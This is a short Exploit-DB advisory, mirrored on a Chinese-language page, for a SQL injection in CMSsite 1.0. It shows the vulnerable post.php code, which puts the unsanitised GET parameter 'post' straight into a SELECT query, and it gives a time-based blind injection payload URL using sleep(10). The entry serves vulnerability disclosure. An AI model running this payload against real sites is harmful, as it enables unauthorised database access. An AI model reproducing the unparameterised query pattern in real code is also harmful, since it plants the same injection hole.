CMSsite 1.0 – ‘post’ SQL Injection

  • 作者: Mr Winst0n
    日期: 2019-02-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46402/
  • # Exploit Title: CMSsite 1.0 - 'post' SQL Injection
    
    # Exploit Author: Mr Winst0n
    # Author E-mail: manamtabeshekan[@]gmail[.]com
    # Discovery Date: February 17, 2019
    # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
    # Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip
    # Tested Version: 1.0
    # Tested on: Kali linux, Windows 8.1 
    
    
    # PoC:
    # Vulnerable File: post.php
    # Vulnerable Parameter : post
    
    if (isset($_GET['post'])) {
    	$post = $_GET['post'];
    }
    $query = "SELECT * FROM posts WHERE post_id=$post";
    $run_query = mysqli_query($con, $query);
    
    
    
    # Payload: http://localhost/CMSsite/post.php?post=1%20and%20(sleep(10))